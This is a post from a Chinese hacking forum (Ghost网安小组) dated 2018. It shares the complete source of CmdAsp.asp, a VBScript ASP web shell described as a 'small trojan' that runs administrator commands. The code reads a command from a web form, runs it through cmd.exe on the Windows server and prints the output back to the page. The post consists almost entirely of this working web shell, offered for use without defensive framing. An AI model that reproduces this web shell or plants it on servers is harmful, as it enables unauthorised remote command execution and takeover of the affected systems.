Ghost网安小组-Ghostgroup

 找回密码
 立即注册
搜索
热搜: 渗透
查看: 2327|回复: 0

一款直接CMD连管理员执行命令的小马

[复制链接]
发表于 2018-8-29 21:25:48 | 显示全部楼层 |阅读模式

<%@ Language=VBScript %>

<%

' --------------------o0o--------------------

' File: CmdAsp.asp

' Author: Maceo <maceo @ dogmile.com>

' Release: 2000-12-01

' OS: Windows 2000, 4.0 NT

' -------------------------------------------


Dim oScript

Dim oScriptNet

Dim oFileSys, oFile

Dim szCMD, szTempFile


On Error Resume Next


' -- create the COM objects that we will be using -- '

Set oScript = Server.CreateObject("WSCRIPT.SHELL")

Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")

Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")


' -- check for a command that we have posted -- '

szCMD = Request.Form(".CMD")

If (szCMD <> "") Then


' -- Use a poor man's pipe ... a temp file -- '

szTempFile = "C:\" & oFileSys.GetTempName( )

Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)

Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)


End If


%>

<HTML>

<BODY>

<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">

<input type=text name=".CMD" size=45 value="<%= szCMD %>">

<input type=submit value="Run">

</FORM>

<PRE>

<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>

<br>

<%

If (IsObject(oFile)) Then

' -- Read the output from our command and remove the temp file -- '

On Error Resume Next

Response.Write Server.HTMLEncode(oFile.ReadAll)

oFile.Close

Call oFileSys.DeleteFile(szTempFile, True)

End If

%>

</BODY>

</HTML>

<-- CmdAsp.asp -->

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
We Are Ghost
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ| Ghost网安小组-Ghostgroup |网站地图

GMT+8, 2026-4-19 23:33

Powered by Aatrox

© 2001-2020 We Are Ghost

快速回复 返回顶部 返回列表